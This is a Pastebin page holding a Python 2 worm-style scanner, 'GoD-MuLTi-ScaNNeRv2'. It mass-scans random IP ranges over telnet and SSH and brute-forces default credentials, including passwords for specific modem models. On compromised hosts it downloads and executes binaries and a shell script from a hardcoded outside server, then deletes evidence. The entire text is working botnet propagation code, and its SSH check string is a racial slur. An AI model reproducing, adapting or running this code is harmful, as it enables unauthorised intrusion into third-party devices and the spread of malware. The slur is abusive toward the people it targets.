Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- """
- GoD-MuLTi-ScaNNeRv2(NeTiS/TeLNeT/SSH)
- By; LiGhT
- """
- import threading, sys, time, random, socket, re, os, paramiko
- if len(sys.argv) < 5:
- print "GoD-MuLTi-ScaNNeR v2\n By: LiGhT"
- print "Usage: python "+sys.argv[0]+" <threads(50-1000)> <ips per scan(100-10000)> <ssh pass list(1,2,3)> <ssh ranges(A,B,C,D)>\n"
- print "Example: python "+sys.argv[0]+" 500 5000 1 A\n"
- sys.exit()
- # USER AND PASS LISTS #
- usernames = ["root", "admin"] #DONT CHANGE
- passwords = ["oelinux123", "admin"] #DONT CHANGE
- if sys.argv[3] == "1":
- ssh_passwords = ["admin:1234"]
- elif sys.argv[3] == "2":
- ssh_passwords = ["admin:admin","root:root"]
- elif sys.argv[3] == "3":
- ssh_passwords = ["admin:1234","root:root","root:1234","admin:admin"]
- loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
- # START CONFIGURATION #
- url = "http://64.137.172.53/82sr1" # ARM4 Binary
- sh_file = "http://64.137.172.53/pewpew.sh" # SH File
- commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf 82sr5; wget http://64.137.172.53/82sr5 || tftp -r 82sr5 -g 64.137.172.53; chmod 777 82sr5; ./82sr5; rm -rf 82sr5\x00" # MIPSEL Binary
- # DONT TOUCH
- spawn_shell = "cat | sh"
- paramiko.util.log_to_file("/dev/null") #quiets paramiko output
- threads = int(sys.argv[1])
- h0h0 = int(sys.argv[2])
- Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.189","182.190","182.191"]
- if sys.argv[4] == "A":
- Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
- elif sys.argv[4] == "B":
- Sranges = ["210.213","119.83","119.84","119.85","124.83","182.52","182.68","182.69","182.70"]
- elif sys.argv[4] == "C":
- Sranges = ["112.200","112.201","112.202","112.203","112.204","112.205","112.206","112.207","112.208","112.209","112.210","112.211","112.212","112.213","112.214"]
- elif sys.argv[4] == "D":
- Sranges = ["125.24","125.25","125.26","125.27","125.28","118.175","118.173","182.52"]
- else:
- Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
- def readUntil(tn, string, timeout=8):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.01)
- if string in buf: return buf
- raise Exception('TIMEOUT!')
- def worker():
- try:
- while True:
- try:
- h0h0h0 = h0h0 + 1
- br = random.choice(Sranges)
- for x in xrange(h0h0h0):
- try:
- ip = ''+br+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
- ss = sssh(ip)
- ss.start()
- time.sleep(0.009)
- except:
- pass
- br2 = random.choice(Tranges)
- for y in xrange(h0h0h0):
- try:
- ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
- tt = ttelnet(ip)
- tt.start()
- time.sleep(0.009)
- except:
- pass
- time.sleep(2)
- except:
- print "\033[31mWORKER ERROR\033[37m"
- pass
- except:
- pass
- class ttelnet(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- tn = socket.socket()
- tn.settimeout(8)
- tn.connect((self.ip,23))
- except Exception:
- pass
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if "mdm9625" in hoho:
- r00t = 0
- username = usernames[1]
- password = passwords[1]
- tn.send(username + "\n")
- elif "9615-cdp" in hoho:
- r00t = 1
- username = usernames[0]
- password = passwords[0]
- tn.send(username + "\n")
- except Exception:
- pass
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if "assword" in hoho:
- tn.send(password + "\n")
- time.sleep(3.5)
- except Exception:
- pass
- try:
- mp = ''
- mp += tn.recv(1024)
- if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
- if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
- if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
- except Exception:
- pass
- class sssh(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- x = 1
- while x != 0:
- try:
- username='root'
- password="0"
- port = 22
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- dobreak=False
- for passwd in ssh_passwords:
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
- dobreak=True
- break
- except:
- pass
- if True == dobreak:
- break
- badserver=True
- stdin, stdout, stderr = ssh.exec_command("echo nigger")
- output = stdout.read()
- if "nigger" in output:
- badserver=False
- if badserver == False:
- print "\033[36m[SSH] Command Sent %s!\033[37m"%(self.ip)
- ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
- time.sleep(10)
- ssh.close()
- x = 0
- if badserver == True:
- ssh.close()
- except:
- pass
- x = 0
- for g in xrange(threads):
- try:
- print "started %s thread"%(g)
- t = threading.Thread(target=worker)
- t.start()
- time.sleep(0.002)
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement